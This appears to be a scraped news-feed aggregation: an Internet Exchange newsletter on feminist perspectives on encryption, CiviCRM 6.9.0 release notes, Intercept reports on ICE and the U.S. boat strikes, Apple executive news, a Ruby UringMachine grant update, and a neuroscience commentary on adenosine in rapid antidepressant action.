A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance.
Gerda Binder, Hera Hussain, Georgia Bullen, Audrey Hingle, Lucy Purdon, and Mallory Knodel in our MozFest session.
By Audrey Hingle
Our MozFest session on
Encryption and Feminism: Reimagining Child Safety Without Surveillance
was bigger than a one-hour festival slot could contain. The room filled fast, people were turned away at the door, and the Q&A could have gone on twice as long. Many attendees told us afterwards that this is the conversation they’ve been waiting to have. That feminist perspectives on encryption aren’t just welcome, they’re needed. So we’re opening the circle wider and taking it online so more people can join in.
In the room, we heard reflections that reminded us why this work matters. In feedback forms, attendees told us encryption isn’t only a security feature, it’s
“part of upholding the rights of kids and survivors too, now let’s prove that to the rest of the world!”
Another participant said they left ready to
“be a champion of encryption to protect all.”
Someone else named what many feel:
“More feminist spaces are needed!”
It quickly became clear that this work is collective. It’s about shifting assumptions, building new narratives, and demanding technology that does not treat privacy as optional or as something only privacy hardliners or cryptography experts care about. Privacy is safety, dignity, and a precondition for seeking help. It is necessary to explore identity, form relationships, and grow up. Privacy is a human right.
We also heard calls for clarity and practicality: to reduce jargon, show people what encryption actually does, and push for privacy-preserving features more generally like screenshot protection and sender-controlled forwarding.
Participants also reminded us that encryption must account for disparity and intersectionality. Surveillance is not experienced equally. Some communities never get to “opt in” or consent at all. Feminist principles for encryption must reflect that reality.
And importantly, we heard gratitude for the tone of the session: open, candid, grounded, and not afraid to ask hard questions.
“Normalize the ability to have tricky conversations in movement spaces,”
someone wrote. We agree. These conversations shouldn’t only happen at conferences, they should live inside policy rooms, product roadmaps, activist communities, parenting forums, classrooms.
So let’s keep going.
New Virtual Session: Encryption and Feminism: Reimagining Child Safety Without Surveillance
🗓️ Feb 10, 4PM GMT,
Online
Whether you joined us at MozFest, could't make it to Barcelona, or were one of the many who could not get into the room, this session is for you. We are running the event again online so more people can experience the conversation in full. We will revisit the discussion, share insights from the panel, and walk through emerging Feminist Encryption Principles, including the ideas and questions raised by participants.
Help us grow this conversation. Share it with friends and colleagues who imagine a future where children are protected without surveillance and where privacy is not a privilege, but a right.
We hope you’ll join us!
Related
: If you care about privacy-preserving messaging apps, Phoenix R&D is inviting feedback through
a short survey
asking for input on what features matter most for those in at-risk contexts.
New book from IX client
Dr. Luca Belli
looks at how recommender systems function, how they are measured, and why accountability remains difficult. Luca draws on his experience co-founding Twitter’s ML Ethics, Transparency and Accountability work, contributing to standards at NIST, and advising the European Commission on recommender transparency.
Now available via MEAP on Manning. Readers can access draft chapters as they are released, share feedback directly, and receive the final version when complete. Suitable for researchers, policy teams, engineers, and anyone involved in governance or evaluation of large-scale recommendation systems. It is also written for general readers, with no advanced technical knowledge required, so when you're done with it, hand it to a curious family member who wants to understand how algorithms decide what they see.
Support the Internet Exchange
If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.
Not ready for a long-term commitment? You can always
leave us a tip
.
Last week’s Franco-German Summit on European Digital Sovereignty set the stage for Eurosky, part of the Free Our Feeds initiative, which is building public-interest social media infrastructure on the Bluesky-backed ATProtocol to reduce Europe’s tech dependencies and create real alternatives to today’s centralized platforms.
https://openfuture.eu/blog/eurosky-dawns-building-infrastructure-for-sovereign-social-media
Internet Governance
The Seoul Statement is a joint declaration released at the International AI Standards Summit issued by the three major international standards bodies: ISO, IEC, and ITU. It outlines their shared commitments for developing inclusive, human-rights-aware, globally interoperable standards for AI.
https://www.aistandardssummit.org/event/354f4a77-ee25-47e3-8e84-291a55519c0c/seoul-statement
At the November 2025 TPAC event, François Daoust presented the Process 2025 which simplifies W3C’s standardization by removing the Proposed Recommendation stage.
https://www.youtube.com/watch?v=KtXCtlAp9OU
Add Surveillance News to your RSS reader to get the latest about state surveillance and threats facing social movements.
https://activistchecklist.org/news
In the new report
Bubble or Nothing
, Advait Arun examines whether the current AI-driven data center boom is economically sustainable—or whether it’s vulnerable to collapse if the tech sector cools.
https://publicenterprise.org/report/bubble-or-nothing
In the latest episode of Occupied Tech, Tech For Palestine’s Paul Biggar is joined by Adil Abbuthalha, entrepreneur and creator of BoyCat — an innovative app empowering consumers to make ethical shopping choices and support the boycott movement against Israel.
https://www.youtube.com/watch?v=2MJ1CyJKTXg
Tramas is a research-action project of theCoalición Feminista Decolonial por la Justicia Digital y Ambiental. Through cases and testimonies of resistance in several Latin American countries, they seek to unravel the complexity of contemporary digital extractivism processes.
https://tramas.digital
Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes.
Your are encouraged to upgrade now f...
Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the
monthly release notes
.
Your are encouraged to upgrade now for the most stable, secure CiviCRM experience:
CiviCRM is community driven and is sustained through code contributions and generous financial support.
We are committed to keeping CiviCRM free and open,
forever
. We depend on your support to help make that happen. Please consider
supporting CiviCRM today
.
AGH Strategies
- Alice Frumin;
Agileware Pty
Ltd - Iris, Justin Freeman; akwizgran;
ALL IN APPLI
- Guillaume Sorel;
Artful Robot
- Rich Lott; BrightMinded Ltd - Bradley Taylor; Christian Wach; Christina;
Circle Interactive
- Dave Jenkins, Rhiannon Davies;
CiviCoop
- Jaap Jansma, Erik Hommel; CiviCRM - Coleman Watts, Tim Otten, Benjamin W;
civiservice.de
- Gerhard Weber; CompuCo - Muhammad Shahrukh;
Coop SymbioTIC
- Mathieu Lutfy, Samuel Vanhove, Shane Bill; cs-bennwas; CSES (Chelmsford Science and Engineering Society) - Adam Wood; Dave D;
DevApp
- David Cativo; Duncan Stanley White;
Freeform Solutions
- Herb van den Dool;
Fuzion
- Jitendra Purohit, Luke Stewart; Giant Rabbit - Nathan Freestone; Greenpeace Central and Eastern Europe - Patrick Figel;
INOEDE Consulting
- Nadaillac; JacquesVanH;
JMA Consulting
- Seamus Lee;
Joinery
- Allen Shaw; Lemniscus - Noah Miller;
Makoa
- Usha F. Matisson; Megaphone Technology Consulting - Jon Goldberg;
MJW Consulting
- Matthew Wire; Mosier Consulting - Justin Mosier; Nicol Wistreich; OrtmannTeam GmbH - Andreas Lietz;
Progressive Technology Project
- Jamie McClelland;
Progressive Technology Project
- Jamie McClelland; Richard Baugh;
Skvare
- Sunil Pawar; Sarah Farrell-Graham;
Squiffle Consulting
- Aidan Saunders;
Tadpole Collective
- Kevin Cristiano; Wikimedia Foundation - Eileen McNaughton; Wildsight - Lars Sander-Green
New Extensions
Membership AJAX Permissions
- This CiviCRM extension modifies the API permissions to allow it to be called with just the "Access AJAX API" permission instead of requiring the more restrictive default permissions.
civiglific
- Integrates Glific (
https://glific.org
) with CiviCRM to sync contact groups and send automated WhatsApp messages and receipts to contributors.
ICE Denies Pepper-Spraying Rep. Adelita Grijalva in Incident Caught on Video
Intercept
theintercept.com
2025-12-06 00:19:09
Heavily armed tactical teams fired crowd suppression munitions at the Arizona lawmaker and protesters, claiming she was leading “a mob.”
The post ICE Denies Pepper-Spraying Rep. Adelita Grijalva in Incident Caught on Video appeared first on The Intercept....
Federal immigration agents
pepper-sprayed and shot crowd suppression munitions at newly sworn-in Arizona Rep. Adelita Grijalva during a confrontation with protesters in Tucson on Friday.
A
video
Grijalva posted online shows an agent in green fatigues indiscriminately dousing a line of several people — Grijalva included — with pepper spray outside a popular taco restaurant.
“You guys need to calm down and get out,” Grijalva says, coughing amid a cloud of spray. In another clip, an agent fires a pepper ball at Grijalva’s feet.
Department of Homeland Security assistant secretary Tricia McLaughlin denied that Grijalva was pepper-sprayed in a statement, saying that if her claims were true, “this would be a medical marvel. But they’re not true. She wasn’t pepper sprayed.”
“She was in the vicinity of someone who *was* pepper sprayed as they were obstructing and assaulting law enforcement,” McLaughlin continued. The comment suggested a lack of understanding as to how pepper spray works. Fired from a distance, pepper-spray canisters create a choking cloud that will affect anyone in the vicinity, as Grijalva’s video showed.
In a
separate video
Grijalva posted to Facebook, the Democratic representative from Southern Arizona described community members confronting approximately 40 Immigration and Customs Enforcement agents in several vehicles.
“I was here, this is like the restaurant I come to literally once a week,” she said, “and was sprayed in the face by a very aggressive agent, pushed around by others.” Grijalva maintained that she was not being aggressive. “I was asking for clarification,” she said. “Which is my right as a member of Congress.”
Video
from journalists on the ground show dozens of heavily armed agents — members ICE’s high-powered Homeland Security Investigations wing and the Department of Homeland Security’s SWAT-style Special Response teams — deploying flash-bang grenades, tear gas, and pepper-ball rounds at a crowd of immigrant rights protesters near Taco Giro, a popular mom-and-pop restaurant in west Tucson.
According to McLaughlin, two “law enforcement officers were seriously injured by this mob that Rep. Adelita Grijalva joined.” She provided no evidence or details for the claim.
“Presenting one’s self as a ‘Member of Congress’ doesn’t give you the right to obstruct law enforcement,” McLaughlin wrote. The DHS press secretary did not respond to a question about the munitions fired at Grijalva’s feet.
Grijalva “was doing her job, standing up for her community,” Sen. Ruben Gallego, D-Ariz., said in
a social media
post Friday. “Pepper-spraying a sitting member of Congress is disgraceful, unacceptable, and absolutely not what we voted for. Period.”
Additional
footage
from Friday’s scene shows Grijalva and members of the media face-to-face with several heavily armed, uniformed Homeland Security Investigation agents as they loaded at least two people — both with their hands zip-tied behind their backs — into a large gray van.
Grijalva identifies herself as a member of Congress and asks where they are being taken. One of the masked agents initially replies, “I can’t verify that.” Another pushes the congresswoman and others back with forearm. “Don’t push me,” Grijalva says multiple times. A third masked agent steps in front of the Arizona lawmaker, makes a comment about “assaulting a federal officer,” and then says the people taken into custody would be transferred to “federal jail.”
“We saw people directly sprayed, members of our press, everybody that was with me, my staff member, myself,” Grijalva said in her video report from Friday’s chaotic scene. She described the events as the latest example of a Trump administration that is flagrantly flouting the rule of law, due process, and the Constitution.
“They’re literally disappearing people from the streets,” she said. “I can just only imagine how if they’re going to treat me like that, how they’re treating other people.”
The violence Grijalva experienced Friday marked the latest chapter in what has been a dramatic year for Arizona’s first Latina representative.
Grijalva won a special election in Arizona’s 7th Congressional District earlier this year to replace her father, Raúl Grijalva, a towering progressive figure in the state who represented Tucson for more than 20 years before passing away in March.
Republican Speaker of the House Mike Johnson delayed the younger Grijalva’s swearing in for nearly two months amid the longest
government shutdown
in history. Grijalva would add the deciding signature on a discharge petition to release
files
related to convicted sex trafficker Jeffrey Epstein, which she signed immediately after taking office.
Boat Strike Survivors Clung to Wreckage for Some 45 Minutes Before U.S. Military Killed Them
Intercept
theintercept.com
2025-12-06 00:07:45
“There are a lot of disturbing aspects. But this is one of the most disturbing.”
The post Boat Strike Survivors Clung to Wreckage for Some 45 Minutes Before U.S. Military Killed Them appeared first on The Intercept....
Two survivors clung
to the wreckage of a vessel attacked by the U.S. military for roughly 45 minutes before a second strike killed them on September 2. After about three quarters of an hour, Adm. Frank Bradley, then head of Joint Special Operations Command, ordered a follow-up strike —
first reported
by The Intercept in September — that killed the shipwrecked men, according to three government sources and a senior lawmaker.
Two more missiles followed that finally sank the foundering vessel. Bradley, now the chief of Special Operations Command, claimed that he conducted multiple strikes because the shipwrecked men and the fragment of the boat still posed a threat, according to the sources.
Secretary of War Pete Hegseth distanced himself from the follow-up strike during a Cabinet meeting at the White House,
telling reporters
he “didn’t personally see survivors” amid the fire and smoke and had left the room before the second attack was ordered. He evoked the “fog of war” to justify the decision for more strikes on the sinking ship and survivors.
Rep. Adam Smith, D-Wash., the ranking member of the House Armed Services Committee, said Hegseth provided misleading information and that the video shared with lawmakers Thursday showed the reality in stark light.
“We had video for 48 minutes of two guys hanging off the side of a boat. There was plenty of time to make a clear and sober analysis,” Smith
told CNN
on Thursday. “You had two shipwrecked people on the top of the tiny little bit of the boat that was left that was capsized. They weren’t signaling to anybody. And the idea that these two were going to be able to return to the fight — even if you accept all of the questionable legal premises around this mission, around these strikes — it’s still very hard to imagine how these two were returning to any sort of fight in that condition.”
Three other sources familiar with briefings by Bradley provided to members of the House Permanent Select Committee on Intelligence and the Senate and House Armed Services committees on Thursday confirmed that roughly 45 minutes elapsed between the first and second strikes. “They had at least 35 minutes of clear visual on these guys after the smoke of the first strike cleared. There were no time constraints. There was no pressure. They were in the middle of the ocean and there were no other vessels in the area,” said one of the sources. “There are a lot of disturbing aspects. But this is one of the most disturbing. We could not understand the logic behind it.”
The three sources said that after the first strike by U.S. forces, the two men climbed aboard a small portion of the capsized boat. At some point the men began waving to something overhead, which three people familiar with the briefing said logically must have been U.S. aircraft flying above them. All three interpreted the actions of the men as signaling for help, rescue, or surrender.
“They were seen waving their arms towards the sky,” said one of the sources. “One can only assume that they saw the aircraft. Obviously, we don’t know what they were saying or thinking, but any reasonable person would assume that they saw the aircraft and were signaling either: don’t shoot or help us. But that’s not how Bradley saw it.”
Special Operations Command did not reply to questions from The Intercept prior to publication.
During the Thursday briefings, Bradley claimed that he believed there was cocaine in the quarter of the boat that remained afloat, according to the sources. He said the survivors could have drifted to land or to a rendezvous point with another vessel, meaning that the alleged drug traffickers still had the ability to transport a deadly weapon — cocaine — into the United States, according to one source. Bradley also claimed that without a follow-up attack, the men might rejoin “the fight,” another source said.
Sen. Tom Cotton, R-Ark., echoed that premise, telling reporters after the briefings that the additional strikes on the vessel were warranted because the shipwrecked men were “trying to flip a boat, loaded with drugs bound for the United States, back over so they could stay in the fight.”
None of the three sources who spoke to The Intercept said there was any evidence of this. “They weren’t radioing anybody and they certainly did not try to flip the boat. [Cotton’s] comments are untethered from reality,” said one of the sources.
Sarah Harrison, who previously advised Pentagon policymakers on issues related to human rights and the law of war, said that the people in the boat weren’t in any fight to begin with. “They didn’t pose an imminent threat to U.S. forces or the lives of others. There was no lawful justification to kill them in the first place let alone the second strike,” she told The Intercept. “The only allegation was that the men were transporting drugs, a crime that doesn’t even carry the death penalty.”
The Justice Department’s Office of Legal Counsel this summer produced a
classified opinion
intended to shield service members up and down the chain of command from prosecution. The legal theory advanced in the finding claims that narcotics on the boats are lawful military targets because their cargo generates revenue, which can be used to buy weaponry, for cartels whom the Trump administration claims are in armed conflict with the U.S.
The Trump administration claims that at least 24
designated terrorist organizations
are engaged in “non-international armed conflict” with the United States including the Venezuelan gang Tren de Aragua; Ejército de Liberación Nacional, a Colombian guerrilla insurgency; Cártel de los Soles, a Venezuelan criminal group that the U.S.
claims
is “headed by Nicolas Maduro and other high-ranking Venezuelan individuals”; and several groups affiliated with the Sinaloa Cartel.
The military has carried out 22 known attacks, destroying 23 boats in the Caribbean Sea and eastern Pacific Ocean since September,
killing at least 87 civilians
. The most recent attack occurred in the Pacific Ocean on Thursday and killed four people.
Since the attacks began, experts in the laws of war and members of Congress,
from both parties
, have said the strikes are illegal
extrajudicial killings
because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.
Dithering: ‘Alan Dye Leaves Apple’
Daring Fireball
dithering.passport.online
2025-12-05 23:25:09
Dithering is my and Ben Thompson’s twice-a-week podcast — 15 minutes per episode, not a minute less, not a minute more. It’s a $7/month or $70/year subscription, and included in the Stratechery Plus bundle (a bargain). This year our CMS (Passport — check it out) gained a feature that lets us ma...
Aaron Tilley and Wayne Ma, in a piece headlined “Why Silicon Valley is Buzzing About Apple CEO Succession” at the paywalled-up-the-wazoo The Information:
Prediction site Polymarket places Ternus’ odds of getting the
job at nearly 55%, ahead of other current Apple executives
such as software head...
This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.
What can I do to resolve this?
You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.
Lisa Jackson on The Talk Show Back in 2017
Daring Fireball
daringfireball.net
2025-12-05 22:37:35
This interview was both interesting and a lot of fun. Worth a listen or re-listen.
★
...
Special guest Lisa Jackson — Apple’s vice president of Environment, Policy, and Social Initiatives — joins the show for an Earth Day discussion of the state of Apple’s environmental efforts: climate change, renewable energy, responsible packaging, and Apple’s new goal to create a “closed-loop supply chain”, wherein the company’s products would be manufactured entirely from recycled materials.
Apple Newsroom, yesterday:
Apple today announced that Jennifer Newstead will become Apple’s
general counsel on March 1, 2026, following a transition of duties
from Kate Adams, who has served as Apple’s general counsel since
2017. She will join Apple as senior vice president in January,
reporting...
Jennifer Newstead to join Apple as senior vice president, will become general counsel in March 2026
Kate Adams to retire late next year
Lisa Jackson to retire
CUPERTINO, CALIFORNIA
Apple today announced that Jennifer Newstead will become Apple’s general counsel on March 1, 2026, following a transition of duties from Kate Adams, who has served as Apple’s general counsel since 2017. She will join Apple as senior vice president in January, reporting to CEO Tim Cook and serving on Apple’s executive team.
In addition, Lisa Jackson, vice president for Environment, Policy, and Social Initiatives, will retire in late January 2026. The Government Affairs organization will transition to Adams, who will oversee the team until her retirement late next year, after which it will be led by Newstead. Newstead’s title will become senior vice president, General Counsel and Government Affairs, reflecting the combining of the two organizations. The Environment and Social Initiatives teams will report to Apple chief operating officer Sabih Khan.
“Kate has been an integral part of the company for the better part of a decade, having provided critical advice while always advocating on behalf of our customers’ right to privacy and protecting Apple’s right to innovate,” said Tim Cook, Apple’s CEO. “I am incredibly grateful to her for the leadership she has provided, for her remarkable determination across a myriad of highly complex issues, and above all, for her thoughtfulness, her deeply strategic mind, and her sound counsel.”
“I am deeply appreciative of Lisa’s contributions. She has been instrumental in helping us reduce our global greenhouse emissions by more than 60 percent compared to 2015 levels,” said Cook. “She has also been a critical strategic partner in engaging governments around the world, advocating for the best interests of our users on a myriad of topics, as well as advancing our values, from education and accessibility to privacy and security.”
“We couldn’t be more pleased to have Jennifer join our team,” said Cook. “She brings an extraordinary depth of experience and skill to the role, and will advance Apple’s important work all over the world. We are also pleased that Jennifer will be overseeing both the Legal and Government Affairs organizations, given the increasing overlap between the work of both teams and her substantial background in international affairs. I know she will be an excellent leader going forward.”
“I have long admired Apple’s deep focus on innovation and strong commitment to its values, its customers, and to making the world a better place,” said Newstead. “I am honored to join the company and to lead an extraordinary team who are dedicated each and every day to doing what’s in the best interest of Apple’s users.”
“It has been one of the great privileges of my life to be a part of Apple, where our work has always been about standing up for the values that are the foundation of this great company,” said Adams. “I am proud of the good our wonderful team has done over the past eight years, and I am filled with gratitude for the chance to have made a difference. Jennifer is an exceptional talent and I am confident that I am leaving the team in the very best hands, and I’m really looking forward to working more closely with the Government Affairs team.”
“Apple is a remarkable company and it has been a true honor to lead such important work here,” said Jackson. “I have been lucky to work with leaders who understand that reducing our environmental impact is not just good for the environment, but good for business, and that we can do well by doing good. And I am incredibly grateful to the teams I’ve had the privilege to lead at Apple, for the innovations they’ve helped create and inspire, and for the advocacy they’ve led on behalf of our users with governments around the world. I have every confidence that Apple will continue to have a profoundly positive impact on the planet and its people.”
Newstead was most recently chief legal officer at Meta and previously served as the legal adviser of the U.S. Department of State, where she led the legal team responsible for advising the Secretary of State on legal issues affecting the conduct of U.S. foreign relations. She held a range of other positions in government earlier in her career as well, including as general counsel of the White House Office of Management and Budget, as a principal deputy assistant attorney general of the Office of Legal Policy at the Department of Justice, as associate White House counsel, and as a law clerk to Justice Stephen Breyer of the U.S. Supreme Court. She also spent a dozen years as partner at Davis Polk & Wardwell LLP, where she advised global corporations on a wide variety of issues. Newstead holds an AB from Harvard University and a JD from Yale Law School.
Stay up to date with the latest articles from Apple Newsroom.
I’m currently doing grant work for the Japanese Ruby Association on
UringMachine
, a new Ruby gem
that provides a low-level API for working with
io_uring
. As part of my work
I’ll be providing weekly updates on this website. Here’s what I did this week:
Last week I wrote about the work I did under the guidance of
Samuel
Williams
to improve the behavior of fiber
schedulers when forking. After some discussing the issues around forking with
Samuel, we decided that the best course of action would be to remove the fiber
scheduler after a fork. Samuel did work around
cleaning up schedulers in
threads that terminate on fork
, and
I submitted a
PR
for removing the
scheduler from the active thread on fork, as well as resetting the fiber to
blocking mode. This is my first contribution to Ruby core!
I Continued implementing the missing fiber scheduler hooks:
#fiber_interrupt
,
#address_resolve
,
#timeout_after
. For the most part,
they were simple to implement. I probably spent most of my time figuring out
how to test these, rather than implementing them. Most of the hooks involve
just a few lines of code, with many of them consisting of a single line of
code, calling into the relevant UringMachine low-level API.
Implemented the
#io_select
hook, which involved implementing a low-level
UM#select
method. This method took some effort to implement, since it needs
to handle an arbitrary number of file descriptors to check for readiness. We
need to create a separate SQE for each fd we want to poll. When one or more
CQEs arrive for polled fd’s, we also need to cancel all poll operations that
have not completed.
Since in many cases,
IO.select
is called with just a single IO, I also added
a special-case implementation of
UM#select
that specifically handles a
single fd.
Implemented a worker pool for performing blocking operations in the scheduler.
Up until now, each scheduler started their own worker thread for performing
blocking operations for use in the
#blocking_operation_wait
hook. The new
implementation uses a worker thread pool shared by all schedulers, with a
worker count limited to CPU count. Workers are started when needed.
I also added an optional
entries
argument to set the SQE and CQE buffer
sizes when starting a new
UringMachine
instance. The default size is 4096
SQE entries (liburing by default makes the CQE buffer size double that of the
SQE buffer). The blocking operations worker threads specify a value of 4 since
they only use their UringMachine instance for popping jobs off the job queue
and pushing the blocking operation result back to the scheduler.
Added support for
file_offset
argument in
UM#read
and
UM#write
in
preparation for implementing the
#io_pread
and
#io_pwrite
hooks. The
UM#write_async
API, which permits writing to a file descriptor without
waiting for the operation to complete, got support for specifying
length
and
file_offset
arguments as well. In addition,
UM#write
and
UM#write_async
got short-circuit logic for writes with a length of 0.
Added support for specifying buffer offset in
#io_read
and
#io_write
hooks, and support for timeout in
#block
,
#io_read
and
#io_write
hooks.
I found and fixed a problem with how
futex_wake
was done in the low-level
UringMachine code handling mutexes and queues. This fixed a deadlock in the
scheduler background worker pool where clients of the pool where not properly
woken after the submitted operation was done.
I finished work on the
#io_pread
and
#io_pwrite
hooks. Unfortunately, the
test for
#io_pwrite
consistently hangs (not in
IO#pwrite
itself, rather on
closing the file.) With Samuel’s help, hopefully we’ll find a solution…
With those two last hooks, the fiber scheduler implementation is now feature
complete!
Why is The Fiber Scheduler Important?
I think there is some misunderstanding around the Ruby fiber scheduler
interface. This is the only Ruby API that does not have a built-in
implementation in Ruby itself, but rather requires an external library or gem.
The question has been raised lately on Reddit, why doesn’t Ruby include an
“official” implementation of the fiber scheduler?
I guess Samuel is really the person to ask this, but personally I would say this
is really about experimentation, and seeing how far we can take the idea of a
pluggable I/O implementation. Also, the open-ended design of this interface
means that we can use a low-level API such as UringMachine to implement it.
What’s Coming Next Week?
Now that the fiber scheduler is feature complete, I’m looking to make it as
robust as possible. For this, I intend to add a lot of tests. Right now, the
fiber scheduler has 25 tests with 77 assertions, in about 560LOC (the fiber
scheduler itself is at around 220LOC). To me this is not enough, so next week
I’m going to add tests for the following:
IO - tests for all IO instance methods.
working with queues: multiple concurrent readers / writers.
net/http
test: ad-hoc HTTP/1.1 server +
Net::HTTP
client.
sockets: echo server + many clients.
In conjunction with all those tests, I’ll also start working on benchmarks for
measuring the performance of the UringMachine low-level API against the
UringMachine fiber scheduler and against the “normal” thread-based Ruby APIs.
In addition, I’m working on a pull request for adding an
#io_close
hook to the
fiber scheduler interface in Ruby. Samuel already did some preparation for this,
so I hope I can finish this in time for it to be merged in time for the release
of Ruby 4.0.
I intend to release UringMachine 1.0 on Christmas, to mark the release of Ruby
4.0.
What About Papercraft?
This week I also managed to take the time to reflect on what I want to do next
in
Papercraft
. I already wrote
here about wanting to implement template inlining for Papercraft. I also wanted
to rework how the compiled code is generated. I imagined a kind of DSL for code
generation, but I didn’t really know what such a DSL would look like.
Then, a few days ago, the idea hit me. I’ve already played with this idea a last
year, when I wrote Sirop, a sister gem to Papercraft that does a big part of the
work of converting code into AST’s and vice versa. Here’s what I put in the
readme:
Future directions: implement a macro expander with support for quote/unquote:
trace_macro = Sirop.macro do |ast|
source = Sirop.to_source(ast)
quote do
result = unquote(ast)
puts “The result of #{source} is: #{result}”
result
end
end
The example is trivial and contrived, but I suddenly understand how such an
interface could be used to actually generate code in Papercraft. I wrote up an
issue
for this, and
hopefully I’ll have some time to work on this in January.
Adenosine on the common path of rapid antidepressant action: The coffee paradox
As Claude Bernard understood in laying the foundations of experimental medicine, each scientific generation brings us closer to mechanistic truth, yet complete understanding remains elusive (
1
). This has been particularly evident in psychiatric therapeutics, where chance preceded knowledge for a long time. For over twenty years now, we had evidence suggesting that ketamine was a rapid anti-depressant. We knew the electrically charged scalpel of electroconvulsive therapy worked when nothing else did. And we had long suspected that depriving people of sleep benefited them in a transient way. All we were lacking was the mechanistic thread connecting these varied interventions, the common path which might allow for rational, instead of empirical, therapeutic development.
In a study that demonstrates what modern neuroscience can do when technical virtuosity meets conceptual clarity, Yue and colleagues led by Professor Min-Min Luo now provide that thread (
2
). Using genetically encoded adenosine sensors, a comprehensive genetic and pharmacological dissection, and immediate therapeutic translation they show that adenosine signalling is the convergent mechanism of rapid-acting antidepressant therapies. It is a new way of thinking about treatment-resistant depression and not just an incremental science.
The technical achievement
The precise timing is what gives the work its compelling quality. The authors applied GRABAdo1.0, a GPCR-based sensor for adenosine, to monitor online adenosine changes in mood-regulating circuits (
2
). Injection of ketamine (10 mg/kg) and application of electroconvulsive therapy resulted in a substantial spike in extracellular adenosine in the medial prefrontal cortex and hippocampus with peak amplitudes of ∼15% ΔF/F, which peaked in ∼500 s and lasted about 30 minutes above the baseline (Extended Data Fig. 1d–h in
ref. 2
). The specificity to regions is also telling. Even though adenosine increases occurred in the mPFC and hippocampus, no surge occurred in the nucleus accumbens, suggesting affective circuits, not reward circuits.
Figure 1.
Adenosine Signaling: Convergent Mechanisms for Rapid Antidepressants. Three distinct interventions—ketamine (pharmacological), electroconvulsive therapy/ECT (electrical), and acute intermittent hypoxia/aIH (physiological)—converge on a common mechanism: adenosine surges in the medial prefrontal cortex (mPFC). Ketamine triggers adenosine release through metabolic modulation (decreased ATP/ADP ratio) and ENT1/2-mediated efflux, without causing neuronal hyperactivity. ECT produces adenosine surges via neuronal hyperactivity and rapid metabolic demand. aIH generates adenosine through controlled hypoxia in a non-invasive manner. All three interventions activate A1 and A2A adenosine receptors in the mPFC, detected in real-time using fiber photometry with genetically encoded sensors (GRABAdo1.0). This adenosine signaling triggers downstream synaptic plasticity mechanisms (BDNF upregulation, mTOR activation, neuroplasticity), resulting in rapid antidepressant effects with onset in hours and duration lasting days. Clinical Considerations: The adenosine mechanism raises important questions about caffeine consumption patterns.
Tonic signaling
(chronic/baseline coffee consumption) appears protective against depression and may help prevent depressive episodes.
Phasic signaling
(acute pre-treatment coffee) raises mechanistic concerns about potential interference with the adenosine surge during ketamine/ECT administration, though this remains speculative and requires clinical validation. The dual nature of caffeine's effects—protective chronically, potentially interfering acutely—reflects the distinction between tonic baseline adenosine receptor modulation and phasic adenosine surge responses to rapid-acting treatments.
The dose-response-use relationships were clear-cut. When the doses of ketamine were 5 mg/kg, modest signals were seen. But then, at 10 and 20 mg/kg there were very clear effects. The higher doses increased the duration of response but had no effect on the peak amplitude. Two-photon imaging showed that the adenosine signal was spatially diffuse. The kinetics was different from that of acute hypoxia which was used by the authors as a positive control. Ketamine at the standard antidepressant dose (10 mg/kg) produced peak amplitudes of approximately 15% ΔF/F, while higher doses (20–50 mg/kg) reached approximately 35% ΔF/F, still substantially lower than the ∼60% ΔF/F observed with acute hypoxia. However, ketamine's decay rate was much slower, taking greater than 500s compared to the hypoxia decay rate of around 50s. The less pronounced peak but prolonged duration suggests that ketamine causes a sustained metabolic modulation rather than acute cellular stress.
This temporal resolution matters. Measuring constant receptor expression or a single-time point tissue sample would have led to missing the adenosine surge that would turn on and off. Only through continuous optics monitoring could it become possible to find a dynamic signal necessary for therapy.
Determining cause and effect in biology
The rigor of the mechanistic proof is exemplary. The importance of the mechanism indicated by the convergence of genetic and pharmacological approaches is shown by studies. Adora1
−/−
and Adora2a
−/−
mice lost all of the antidepressant efficacy of ketamine in two standard tests for depression. The first being the forced swim test which measures behavioral despair and the other the sucrose preference test which measures anhedonia (
2
). Results were not paradigm-specific. The necessity also applied in the chronic restraint stress model and the lipopolysaccharide model of inflammatory depression (
3
,
4
). Post-hoc acute pharmacological blockade with selective antagonists PSB36 (A1) and ZM241385 (A2A) also completely stripped therapeutic responses to ketamine. This was the case at both 1-hour and 24 hours post-treatment.
The circuit-specificity is equally convincing. Scientists administered AAV-mediated CRISPR-Cas9 to internalize sgRNAs that target Adora1 and Adora2a within the mPFC. The loss of local receptor was sufficient to negate the effect of systemic ketamine (
2
). This confirms the mPFC as a key node—consistent with established mood and executive function roles, now established mechanistically.
The sufficiency experiments complete the logical circle. According to research, adenosine may act to prevent or reverse the onset of some diseases. In fact, direct infusion of adenosine into the mPFC produced antidepressant-like effects lasting 24 hours (
2
). More elegantly, optogenetic stimulation of astrocytes expressing cOpn5, optogenetic tools that trigger Ca²⁺-dependent ATP release and subsequent CD73-mediated adenosine production, produces therapeutic actions, and this effect was extinguished in Nt5e
−/−
mice lacking CD73 (
2
,
5
). Systemic delivery of selective agonists (CHA for A1, CGS21680 for A2A) produced rapid antidepressant responses, with A1-only action potent enough to sustain effects for 24 hours (
2
).
This mechanism was shown with a degree of thoroughness the field demands but rarely achieves.
Mitochondria, not neuronal hyperactivity
The upstream mechanism represents genuinely novel biology. Rather than generating adenosine through extracellular ATP hydrolysis, ketamine directly modulates mitochondrial function to increase intracellular adenosine, which then exits cells via equilibrative nucleoside transporters (ENT1/2). The authors demonstrate this in isolated mPFC mitochondria that are incubated with [
13
C
3
]pyruvate. Ketamine (≥2 μM—therapeutically relevant concentrations) (
6
,
7
) dose-dependently suppressed
13
C enrichment of TCA cycle intermediates fumarate, malate, and aspartate while causing accumulation of pyruvate (
2
).
